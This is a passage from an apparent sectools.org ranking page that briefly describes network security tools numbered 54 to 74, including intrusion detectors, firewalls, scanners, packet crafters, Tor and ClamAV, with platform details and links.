Ike-scan can identify VPNs from manufacturers including Checkpoint, Cisco, Microsoft, Nortel, and Watchguard. <p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="arpwatch"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#54</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">21</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www-nrg.ee.lbl.gov/">Arpwatch</a> : Keeps track of ethernet/IP address pairings and can detect certain <a href="http://sectools.org/tools3.html#dsniff">monkey business</a><br />Arpwatch is the classic ARP man-in-the-middle attack detector from LBNL's Network Research Group. It syslogs activity and reports certain changes via email. Arpwatch uses LibPcap to listen for ARP packets on a local ethernet interface. 
</td></tr></tbody></table><hr /><a name="kismac"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#55</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://kismac.de/"><img src="http://mirror.sectools.org/logos/kismac-80x80.png" align="right" border="0" width="80" height="80" /></a> <a href="http://kismac.de/">KisMAC</a> : A GUI passive wireless stumbler for Mac OS X<br />This popular stumbler for Mac OS X offers many of the features of its namesake <a href="http://sectools.org/index.html#kismet">Kismet</a>, though the codebase is entirely different. Unlike console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet was ported to OS X. It also offers mapping, Pcap-format import and logging, and even some decryption and deauthentication attacks. 
<p>See all <a href="http://sectools.org/wireless.html">wireless tools</a>, and <a href="http://sectools.org/sniffers.html">packet sniffers</a> </p></td></tr></tbody></table><hr /><a name="ossec"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#56</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.ossec.net/">OSSEC HIDS</a> : An Open Source Host-based Intrusion Detection System<br />OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based alerting and active response. In addition to its IDS functionality, it is commonly used as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs, universities and data centers are running OSSEC HIDS to monitor and analyze their firewalls, IDSs, web servers and authentication logs. 
<p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="openbsd-pf"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#57</span><br /><img src="http://mirror.sectools.org/flags/up_g_10x14.gif" width="10" height="14" /><span style="color:#008800;">4</span><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.benzedrine.cx/pf.html">Openbsd PF</a> : The OpenBSD Packet Filter<br />Like <a href="http://sectools.org/index.html#netfilter">Netfilter</a> and <a href="http://sectools.org/tools4.html#ipfilter">IP Filter</a> on other platforms, OpenBSD users love PF, their firewall tool. It handles network address translation, normalizing TCP/IP traffic, providing bandwidth control, and packet prioritization. It also offers some eccentric features, such as passive OS detection. Coming from the same guys who created OpenBSD, you can trust that it has been well audited and coded to avoid the sort of security holes we have seen in <a href="http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=28350">other</a> <a href="http://netfilter.org/security/">packet</a> <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4745">filters</a>. 
<p>See all <a href="http://sectools.org/firewalls.html">firewalls</a> </p></td></tr></tbody></table><hr /><a name="nemesis"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#58</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">18</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.packetfactory.net/projects/nemesis/">Nemesis</a> : Packet injection simplified<br />The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at <a href="http://sectools.org/index.html#hping">Hping2</a> as they complement each other well. 
<p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="tor"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#59</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://tor.eff.org/"><img src="http://mirror.sectools.org/logos/tor-80x50.png" align="right" border="0" width="80" height="50" /></a> <a href="http://tor.eff.org/">Tor</a> : An anonymous Internet communication system<br />Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features. 
For a free cross-platform GUI, users recommend <a href="http://www.vidalia-project.net/">Vidalia</a> <p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="knoppix"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#60</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.knoppix.org/"><img src="http://mirror.sectools.org/logos/knoppix-80x84.png" align="right" border="0" width="80" height="84" /></a> <a href="http://www.knoppix.org/">Knoppix</a> : A general-purpose bootable live system on CD or DVD<br />Knoppix consists of a representative collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a productive Linux system for the desktop, educational CD, rescue system, or as many nmap survey takers attest, a portable security tool. For a security-specific Linux distribution see <a href="http://sectools.org/tools2.html#backtrack">BackTrack</a>. 
<p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="iss"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#61</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">47</span><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt=" TITLE=" costs="" money="" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php"><img src="http://mirror.sectools.org/logos/iss-100x101.gif" align="right" border="0" width="100" height="101" /></a> <a href="http://www.iss.net/products_services/enterprise_protection/vulnerability_assessment/scanner_internet.php">ISS Internet Scanner</a> : Application-level vulnerability assessment<br />Internet Scanner started off in '92 as a tiny open source scanner by Christopher Klaus. Now he has grown ISS into a billion-dollar company with a myriad of security products. 
<p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="fport"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#62</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">39</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.foundstone.com/knowledge/proddesc/fport.html">Fport</a> : Foundstone's enhanced netstat<br />Fport reports all open TCP/IP and UDP ports on the machine you run it on and shows what application opened each port. So it can be used to quickly identify unknown open ports and their associated applications. It only runs on Windows, but many UNIX systems now provide this information via netstat (try 'netstat -pan' on Linux). Here is a PDF-Format <a href="http://www.giac.org/practical/gsec/Teena_Henson_GSEC.pdf">SANS article</a> on using Fport and analyzing the results. 
</td></tr></tbody></table><hr /><a name="chkrootkit"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#63</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.chkrootkit.org/"><img src="http://mirror.sectools.org/logos/chkrootkit-80x135.png" align="right" border="0" width="80" height="135" /></a> <a href="http://www.chkrootkit.org/">chkrootkit</a> : Locally checks for signs of a rootkit<br />chkrootkit is a flexible, portable tool that can check for many signs of rootkit intrusion on Unix-based systems. Its features include detecting binary modification, utmp/wtmp/lastlog modifications, promiscuous interfaces, and malicious kernel modules. 
<p>See all <a href="http://sectools.org/rootkit-detectors.html">rootkit detectors</a> </p></td></tr></tbody></table><hr /><a name="spike"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#64</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">15</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.immunitysec.com/resources-freesoftware.shtml"><img src="http://mirror.sectools.org/logos/spike-80x26.png" align="right" border="0" width="80" height="26" /></a> <a href="http://www.immunitysec.com/resources-freesoftware.shtml">SPIKE Proxy</a> : HTTP Hacking<br />Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the <a href="http://www.immunitysec.com/resources-freesoftware.shtml">Spike Application Testing Suite</a> and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection. 
<p>See all <a href="http://sectools.org/app-scanners.html">application-specific scanners</a> </p></td></tr></tbody></table><hr /><a name="openbsd"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#65</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">14</span><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.openbsd.org/"><img src="http://mirror.sectools.org/logos/openbsd-87x81.gif" align="right" border="0" width="87" height="81" /></a> <a href="http://www.openbsd.org/">OpenBSD</a> : The Proactively Secure Operating System<br />OpenBSD is one of the only operating systems to treat security as their very highest priority. Even higher than usability in some cases. But their enviable security record speaks for itself. They also focus on stability and fight to obtain documentation for the hardware they wish to support. Perhaps their greatest achievement was creating <a href="http://www.openssh.org/">OpenSSH</a>. OpenBSD users also love [pf], their firewall tool. 
<p>See all <a href="http://sectools.org/sec-distros.html">security-oriented operating systems</a> </p></td></tr></tbody></table><hr /><a name="yersinia"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#66</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.yersinia.net/"><img src="http://mirror.sectools.org/logos/yersinia-80x49.png" align="right" border="0" width="80" height="49" /></a> <a href="http://www.yersinia.net/">Yersinia</a> : A multi-protocol low-level attack tool<br />Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and other low-level attacks. 
<p>See all <a href="http://sectools.org/packet-crafters.html">packet crafting tools</a> </p></td></tr></tbody></table><hr /><a name="nagios"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#67</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.nagios.org/"><img src="http://mirror.sectools.org/logos/nagios-80x21.png" align="right" border="0" width="80" height="21" /></a> <a href="http://www.nagios.org/">Nagios</a> : An open source host, service and network monitoring program<br />Nagios is a system and network monitoring application. It watches hosts and services that you specify, alerting you when things go bad and when they get better. Some of its many features include monitoring of network services (smtp, pop3, http, nntp, ping, etc.), monitoring of host resources (processor load, disk usage, etc.), and contact notifications when service or host problems occur and get resolved (via email, pager, or user-defined method). 
<p>See all <a href="http://sectools.org/traffic-monitors.html">traffic monitoring tools</a> </p></td></tr></tbody></table><hr /><a name="fragroute"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#68</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">20</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.monkey.org/%7Edugsong/fragroute/">Fragroute</a>/<a href="http://www.packetstormsecurity.nl/UNIX/IDS/nidsbench/fragrouter.html">Fragrouter</a> : A network intrusion detection evasion toolkit<br />Fragrouter is a one-way fragmenting router - IP packets get sent from the attacker to the Fragrouter, which transforms them into a fragmented data stream to forward to the victim. Many network IDS are unable or simply don't bother to reconstruct a coherent view of the network data (via IP fragmentation and TCP stream reassembly), as discussed in <a href="http://insecure.org/stf/secnet_ids/secnet_ids.html">this classic paper</a>. Fragrouter helps an attacker launch IP-based attacks while avoiding detection. It is part of the <a href="http://www.packetstormsecurity.nl/UNIX/IDS/nidsbench/nidsbench.html">NIDSbench</a> suite of tools by Dug Song. Fragroute is a similar tool which is also by Dug Song. 
<p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="x-scan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#69</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.xfocus.net/tools/200507/1057.html">X-scan</a> : A general scanner for scanning network vulnerabilities<br />A multi-threaded, plug-in-supported vulnerability scanner. X-Scan includes many features, including full NASL support, detecting service types, remote OS type/version detection, weak user/password pairs, and more. You may be able to find newer versions available <a href="http://www.xfocus.net/tools/">here</a> if you can deal with most of the page being written in Chinese. 
<p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="whisker-libwhisker"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#70</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">60</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.wiretrip.net/rfp/">Whisker/libwhisker</a> : Rain.Forest.Puppy's CGI vulnerability scanner and library<br />Libwhisker is a Perl module geared towards HTTP testing. It provides functions for testing HTTP servers for many known security holes, particularly the presence of dangerous CGIs. Whisker is a scanner that used libwhisker but is now deprecated in favor of <a href="http://sectools.org/index.html#nikto">Nikto</a> which also uses libwhisker. 
<p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="socat"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#71</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.dest-unreach.org/socat/">Socat</a> : A relay for bidirectional data transfer<br />A utility similar to the venerable <a href="http://sectools.org/index.html#netcat">Netcat</a> that works over a number of protocols and through files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw, UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides forking, logging, and dumping, different modes for interprocess communication, and many more options. It can be used, for example, as a TCP relay (one-shot or daemon), as a daemon-based socksifier, as a shell interface to Unix sockets, as an IP6 relay, for redirecting TCP-oriented programs to a serial line, or to establish a relatively secure environment (su and chroot) for running client or server shell scripts with network connections. 
<p>See all <a href="http://sectools.org/netcats.html">Netcats</a> </p></td></tr></tbody></table><hr /><a name="sara"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#72</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">46</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www-arc.com/sara/"><img src="http://mirror.sectools.org/logos/sara-80x34.png" align="right" border="0" width="80" height="34" /></a> <a href="http://www-arc.com/sara/">Sara</a> : Security Auditor's Research Assistant<br />SARA is a vulnerability assessment tool derived from the infamous (at least in 1995) SATAN scanner. They ceased development after releasing version 7.9.1 in June 2009. 
<p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="qualysguard"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#73</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/dollarlogo_20x30.gif" alt="Costs money" title="Costs money" width="20" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.qualys.com/"><img src="http://mirror.sectools.org/logos/qualysguard-80x87.png" align="right" border="0" width="80" height="87" /></a> <a href="http://www.qualys.com/">QualysGuard</a> : A web-based vulnerability scanner<br />Delivered as a service over the Web, QualysGuard eliminates the burden of deploying, maintaining, and updating vulnerability management software or implementing ad-hoc security applications. Clients securely access QualysGuard through an easy-to-use Web interface. QualysGuard features 5,000+ unique vulnerability checks, an Inference-based scanning engine, and automated daily updates to the QualysGuard vulnerability KnowledgeBase. 
<p>See all <a href="http://sectools.org/vuln-scanners.html">vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="clamav"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#74</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.clamav.net/"><img src="http://mirror.sectools.org/logos/clamav-94x83.png" align="right" border="0" width="94" height="83" /></a> <a href="http://www.clamav.net/">ClamAV</a> : A GPL anti-virus toolkit for UNIX<br />ClamAV is a powerful AntiVirus scanner focused towards integration with mail servers for attachment scanning. It provides a flexible and scalable multi-threaded daemon, a command line scanner, and a tool for automatic updating via the Internet. Clam AntiVirus is based on a shared library distributed with the Clam AntiVirus package, which you can use with your own software. Most importantly, the virus database is kept up to date. 
